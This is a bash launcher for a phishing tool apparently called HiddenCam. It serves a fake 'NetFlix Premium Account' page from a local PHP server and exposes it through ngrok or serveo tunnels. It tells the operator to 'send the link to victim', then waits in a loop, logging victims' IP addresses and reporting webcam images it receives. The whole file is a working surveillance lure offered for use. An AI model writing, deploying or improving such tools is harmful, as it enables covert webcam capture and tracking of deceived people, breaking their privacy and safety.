#!/bin/bash

trap 'printf "\n";stop' 2
stop() {

checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
checkphp=$(ps aux | grep -o "php" | head -n1)
checkssh=$(ps aux | grep -o "ssh" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi

if [[ $checkphp == *'php'* ]]; then
killall -2 php > /dev/null 2>&1
fi
if [[ $checkssh == *'ssh'* ]]; then
killall -2 ssh > /dev/null 2>&1
fi
exit 1

}
req() {

command -v php > /dev/null 2>&1 || { printf >&2 "\e[0m\e[1;96mPackages are not installed !\n\nType \e[0m\e[1;93m'bash setup.sh'\e[0m\e[1;96m to install it .\n\n"; exit 1; }
command -v curl > /dev/null 2>&1 || { printf >&2 "\e[0m\e[1;96mPackages are not installed !\n\nType \e[0m\e[1;93m'bash setup.sh'\e[0m\e[1;96m to install it .\n\n"; exit 1; }
command -v ssh > /dev/null 2>&1 || { printf >&2 "\e[0m\e[1;96mPackages are not installed !\n\nType \e[0m\e[1;93m'bash setup.sh'\e[0m\e[1;96m to install it .\n\n"; exit 1; }
command -v unzip > /dev/null 2>&1 || { printf >&2 "\e[0m\e[1;96mPackages are not installed !\n\nType \e[0m\e[1;93m'bash setup.sh'\e[0m\e[1;96m to install it .\n\n"; exit 1; }
command -v python2 > /dev/null 2>&1 || { printf >&2 "\e[0m\e[1;96mPackages are not installed !\n\nType \e[0m\e[1;93m'bash setup.sh'\e[0m\e[1;96m to install it .\n\n"; exit 1; }

if [[ -e .www/.cam.log ]]; then
rm -rf .www/.cam.log
fi

if [[ -e .www/.servlink ]]; then
rm -rf .www/.servlink
fi
}
banner() {

clear
printf "\e[1;33m  _    _ _     _     _             \e[1;32m  _____                 \e[0m\n"
printf "\e[1;33m | |  | (_)   | |   | |            \e[1;32m / ____|                \e[0m\n"
printf "\e[1;33m | |__| |_  __| | __| | ___ _ __   \e[1;32m| |     __ _ _ __ ___   \e[0m\n"
printf "\e[1;33m |  __  | |/ _  |/ _  |/ _ \  _ \  \e[1;32m| |    / _  |  _   _ \  \e[0m\n"
printf "\e[1;33m | |  | | | (_| | (_| |  __/ | | | \e[1;32m| |___| (_| | | | | | | \e[0m\n"
printf "\e[1;33m |_|  |_|_|\__,_|\__,_|\___|_| |_| \e[1;32m \_____\__,_|_| |_| |_| \e[0m\n"
printf " \n"
printf "\e[0m\e[1;96m          Tool Created By thelinuxchoice \e[0m\n"
printf " \n"
printf "\e[0m\e[1;93m    Upgraded By HTR-TECH \e[0m\e[1;91m(\e[0m\e[1;92mTahmid Rayat\e[0m\e[1;91m)\e[0m\n"
printf " \n"

}
menu() {
d_o_server="01"

printf " \e[0m\e[1;91m[\e[0m\e[1;97m01\e[0m\e[1;91m]\e[0m\e[1;93m Ngrok\e[0m\n"
printf " \e[0m\e[1;91m[\e[0m\e[1;97m02\e[0m\e[1;91m]\e[0m\e[1;93m Serveo\e[0m\n"
printf "\e[0m\n"
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Select a Port Forwarding option: \e[0m\e[1;96m\en' option_server
option_server="${option_server:-${d_o_server}}"
if [[ $option_server == 1 || $option_server == 01 ]]; then
start_ngrok
elif [[ $option_server == 2 || $option_server == 02 ]]; then
start_serveo

else
printf "\n \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
banner
menu
fi
}
saveip() {	


ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')	
IFS=$'\n'	
printf "\n"	
printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;92m IP:\e[0m\e[1;96m %s\e[0m\n" $ip	
cat ip.txt >> victim-ip.txt

}	
victimfound() {

printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Waiting for Victims ,\e[0m\e[1;96m Ctrl + C to exit.\e[0m\n"
printf "\n"
while [ true ]; do

if [[ -e "victim-ip.txt" ]]; then
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Victim IP Found !!\n"
saveip	
rm -rf victim-ip.txt

fi

sleep 0.5

if [[ -e ".www/.cam.log" ]]; then
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Image Received !!\e[0m\n"
rm -rf .www/.cam.log
fi
sleep 0.5

done 

}
payload_ngrok(){

link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
sed 's+forwarding_link+'$link'+g' .www/NetFlix-Premium-Account.html > .www/NetFlix-Premium-Account.html
sed 's+forwarding_link+'$link'+g' .www/index.php > .www/index.php

}
start_ngrok() {

if [[ -e .www/ngrok ]]; then
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Initializing...\e[0m\e[1;92m(\e[0m\e[1;96mlocalhost:5555\e[0m\e[1;92m)\e[0m\n"
else
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Please Install All Packges.\e[0m\n"
printf "\e[0m\n"
printf "\e[0m\n"
fi

printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Turn on Hotspot To get Ngrok Link !!\e[0m\n"
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Launching Ngrok...\e[0m\n"
cd .www/ && php -S 127.0.0.1:5555 > /dev/null 2>&1 &
sleep 2
./.www/ngrok http 5555 > /dev/null 2>&1 &
sleep 8
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
banner
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $link

payload_ngrok
victimfound
}

payload_serveo() {

send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" .www/.servlink)

sed 's+forwarding_link+'$send_link'+g' .www/NetFlix-Premium-Account.html > .www/NetFlix-Premium-Account.html
sed 's+forwarding_link+'$send_link'+g' .www/index.php > .www/index.php

}
start_serveo() {

default_choose_sub="Y"
default_subdomain="netflix$RANDOM"
def_port="5555"
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Select a Port (Default:\e[0m\e[1;96m %s \e[0m\e[1;92m): \e[0m\e[1;96m' $def_port
read port
port="${port:-${def_port}}"
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Want Custom Subdomain? (Type:\e[0m\e[1;77m \e[1;31m[\e[1;33mY\e[1;31m/\e[1;33mn\e[1;31m]\e[1;32m : \e[0m\e[1;96m'
read choose_sub
choose_sub="${choose_sub:-${default_choose_sub}}"
if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
subdomain_resp=true
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Input your Subdomain: (Default:\e[0m\e[1;96m %s \e[0m\e[1;92m): \e[0m\e[1;96m' $default_subdomain
read subdomain
subdomain="${subdomain:-${default_subdomain}}"
fi

printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Initializing...\e[0m\e[1;92m(\e[0m\e[1;96mlocalhost:$port\e[0m\e[1;92m)\e[0m\n"

if [[ $subdomain_resp == true ]]; then

$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R '$subdomain':80:localhost:$port serveo.net  2> /dev/null > .www/.servlink ' &

sleep 5
else
$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:$port serveo.net 2> /dev/null > .www/.servlink ' &

sleep 5
fi
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Launching Serveo...\e[0m\n"
fuser -k $port/tcp > /dev/null 2>&1
cd .www/ && php -S localhost:$port > /dev/null 2>&1 &
sleep 3
serv_link=$(grep -o "https://[0-9a-z]*\.serveo.net" .www/.servlink)
banner
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n' $serv_link
printf "\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Serveo is Currently Down . So input this command in new tab to Get The link \n'
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m ssh -R 80:localhost:$port ssh.localhost.run \n"
printf "\n"

victimfound
}

banner
req
menu
